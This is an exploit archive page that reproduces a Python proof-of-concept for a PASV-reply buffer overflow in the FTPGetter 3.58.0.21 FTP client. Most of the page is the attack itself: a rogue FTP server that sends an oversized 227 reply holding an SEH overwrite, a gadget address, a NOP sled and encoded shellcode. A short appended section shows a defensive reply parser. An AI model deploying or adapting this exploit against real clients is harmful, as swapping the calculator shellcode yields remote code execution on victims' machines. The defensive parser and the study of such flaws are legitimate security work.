FTPGetter 3.58.0.21 Buffer Overflow

Reported 03 Feb 2011 by modpr0be. Type: packetstorm. Source: packetstormsecurity.com

FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit

Code

```python
#!/usr/bin/python

# Exploit Title: FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit
# Date: 02/03/2011
# Author: modpr0be
# Software Link: http://www.ftpgetter.com/ftpgetter_setup.exe
# Vulnerable version: <= 3.58.0.21
# Tested on: Windows XP SP3 (VMware Player 3.1.3 build-324285)
# CVE : N/A

# ======================================================================
# ___ _ __ __ __ _ __
# ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _
# / __ / / __ `/ / __/ __ `/ / / _ \/ ___/ __ \/ / __ / __ \/ __ `/
# / /_/ / / /_/ / / /_/ /_/ / / / __/ /__/ / / / / /_/ / / / / /_/ /
# \__,_/_/\__, /_/\__/\__,_/_/ \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
# /____/ http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
# say hello to all digital-echidna org crew:
# otoy, cipherstring, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
# special thx:
# otoy, cipherstring, cyb3r.anbu, oebaj.
# help for documentation:
# offsec, exploit-db, corelan-team, 5M7X, loneferret.
#

#### Software description:
# Save time on FTP/SFTP updates! Plan your uploads and automate the workflow.
# Schedule and automate file transfers with a centralized console. Let your
# computer move or synchronize information securely between home and office
# automatically according to the schedule!
#
#### Exploit information:
# There was an error when sending a response to the PASV command.
# Fortunately, these errors lead to buffer overflows.
# This exploit is unstable. It should only be used as a POC.
# I tried several times on various systems,
# the buffer sometimes changed.
#
### Some Conditions:
# This POC is using "the most selling feature" Automated FTP Request.
# So this POC, I use Auto Download with / as the Source Files.
# Scheduler Settings also set to Repetitive.
# Make sure to run the program first before this POC.
#
#### Other information:
# It's a part of "Death of an FTP Client" :)
# For more information, look here:
# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
#
##

from socket import *
import struct
import time

# Layout of the oversized PASV reply: padding up to the SEH record,
# short jump over the handler address, P/P/R gadget, NOP sled, shellcode.
total = 1000
junk1 = "\x41" * 485
nseh = "\xeb\x06\x90\x90"
seh = struct.pack('<L', 0x1001A149) # ppr from ssleay32.dll
nops = "\x90" * 8

# msfpayload windows/exec CMD=calc R | msfencode -t c
# [*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
# BadChars \x00\xff\x0d\x5c\x2f\x0a

shellcode = (
"\xdb\xd1\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x32\xb8\xca\xea\xc0"
"\x1f\x31\x42\x17\x83\xc2\x04\x03\x88\xf9\x22\xea\xf0\x16\x2b"
"\x15\x08\xe7\x4c\x9f\xed\xd6\x5e\xfb\x66\x4a\x6f\x8f\x2a\x67"
"\x04\xdd\xde\xfc\x68\xca\xd1\xb5\xc7\x2c\xdc\x46\xe6\xf0\xb2"
"\x85\x68\x8d\xc8\xd9\x4a\xac\x03\x2c\x8a\xe9\x79\xdf\xde\xa2"
"\xf6\x72\xcf\xc7\x4a\x4f\xee\x07\xc1\xef\x88\x22\x15\x9b\x22"
"\x2c\x45\x34\x38\x66\x7d\x3e\x66\x57\x7c\x93\x74\xab\x37\x98"
"\x4f\x5f\xc6\x48\x9e\xa0\xf9\xb4\x4d\x9f\x36\x39\x8f\xe7\xf0"
"\xa2\xfa\x13\x03\x5e\xfd\xe7\x7e\x84\x88\xf5\xd8\x4f\x2a\xde"
"\xd9\x9c\xad\x95\xd5\x69\xb9\xf2\xf9\x6c\x6e\x89\x05\xe4\x91"
"\x5e\x8c\xbe\xb5\x7a\xd5\x65\xd7\xdb\xb3\xc8\xe8\x3c\x1b\xb4"
"\x4c\x36\x89\xa1\xf7\x15\xc7\x34\x75\x20\xae\x37\x85\x2b\x80"
"\x5f\xb4\xa0\x4f\x27\x49\x63\x34\xd7\x03\x2e\x1c\x70\xca\xba"
"\x1d\x1d\xed\x10\x61\x18\x6e\x91\x19\xdf\x6e\xd0\x1c\x9b\x28"
"\x08\x6c\xb4\xdc\x2e\xc3\xb5\xf4\x4c\x82\x25\x94\x92")

# Pad the remainder so the reply is always exactly `total` bytes long.
junk2 = "\x90" * (total - len(junk1+nseh+seh+nops+shellcode))
payload = junk1+nseh+seh+nops+shellcode+junk2

host = "0.0.0.0"
port = 21

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)

print "\n[+] FTPGetter v3.58.0.21 Buffer Overflow POC"
print "[+] by modpr0be[at]digital-echidna[dot]org."
print "============================================="
print "[+] Evil FTP Server Started."
print "[+] Listening on %d ..." % port

cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
print "[+] Whatever for username and password."

def hajar():
    # Walk the client through a minimal FTP login so it reaches PASV,
    # answering each command with a canned success reply.
    welcome = "220 Welcome to EvilFTP Server\r\n"
    cl.send(welcome)
    cl.recv(1024)
    cl.send("331 User name okay, need password\r\n") # received USER
    cl.recv(1024)
    cl.send("230-Password accepted\r\n") # received PASS
    cl.send("230 User logged in.\r\n")
    cl.recv(1024)
    cl.send("215 UNIX Type: L8\r\n") # received from SYST
    cl.recv(1024)
    cl.send("200 Type set to I\r\n") # received from TYPE I
    cl.recv(1024)
    cl.send("200 OK\r\n") # received from REST 0
    cl.recv(1024)
    cl.send("200 Command not Understood\r\n") # received from OPTS UTF8 OFF
    cl.recv(1024)
    cl.send("257 \"/\" is current directory\r\n") # received from PWD
    cl.recv(1024)
    cl.send("250 CWD Command successful.\r\n")
    cl.recv(1024)
    cl.send("257 \"/\" is current directory\r\n") # received from PWD
    cl.recv(1024)
    cl.send("200 Type set to I\r\n") # received from TYPE I
    cl.recv(1024)
    print "[+] Begin sending evil passive mode.."
    cl.send("227 Entering Passive Mode ("+payload+",1,1,1,1,1)\r\n") # this is the junk from passive mode
    cl.recv(1024)
    cl.close()

hajar()
time.sleep(3)
print "[+] Skadush! Calculator will pop out..\r\n"

s.close()
```
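The root cause above is a client that copies whatever follows `227 Entering Passive Mode (` into a fixed buffer. The following is an added example of how a client should handle that reply instead; it is not part of modpr0be's PoC or of FTPGetter, and the function names are my own. It caps the reply length before any parsing and accepts only the RFC 959 form `(h1,h2,h3,h4,p1,p2)`, so a reply shaped like the one this PoC sends is refused rather than parsed.

```python
import re

# Strict RFC 959 grammar for a 227 reply: six decimal fields inside
# parentheses, each 0-255 (h1,h2,h3,h4,p1,p2), optional trailing "." only.
_PASV_RE = re.compile(
    r"^227 [^\r\n(]{0,64}\((\d{1,3}),(\d{1,3}),(\d{1,3}),"
    r"(\d{1,3}),(\d{1,3}),(\d{1,3})\)[.\s]*$"
)
MAX_REPLY_LEN = 128   # any legitimate 227 reply is far shorter than this


class PasvReplyError(ValueError):
    """Raised for a 227 reply that must not be trusted."""


def parse_pasv_reply(line):
    """Return (host, port) from a 227 reply, or raise PasvReplyError.

    The length check runs first so oversized server data is never handed
    to the parser at all; that is the check the vulnerable client lacked.
    """
    if len(line) > MAX_REPLY_LEN:
        raise PasvReplyError("227 reply too long (%d bytes)" % len(line))
    m = _PASV_RE.match(line)
    if m is None:
        raise PasvReplyError("malformed 227 reply")
    fields = [int(f) for f in m.groups()]
    if any(f > 255 for f in fields):
        raise PasvReplyError("field out of range in 227 reply")
    port = fields[4] * 256 + fields[5]
    if port == 0:
        raise PasvReplyError("port 0 in 227 reply")
    return "%d.%d.%d.%d" % tuple(fields[:4]), port


def rejects(line):
    """True if parse_pasv_reply refuses the reply."""
    try:
        parse_pasv_reply(line)
    except PasvReplyError:
        return True
    return False


# Constructed samples: a benign reply and the shape of this PoC's reply,
# with the shellcode replaced by filler since only the length matters here.
BENIGN_REPLY = "227 Entering Passive Mode (192,0,2,10,4,1)"
POC_SHAPED_REPLY = "227 Entering Passive Mode (" + "A" * 1000 + ",1,1,1,1,1)"

if __name__ == "__main__":
    print(parse_pasv_reply(BENIGN_REPLY))   # ('192.0.2.10', 1025)
    print(rejects(POC_SHAPED_REPLY))        # True
```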
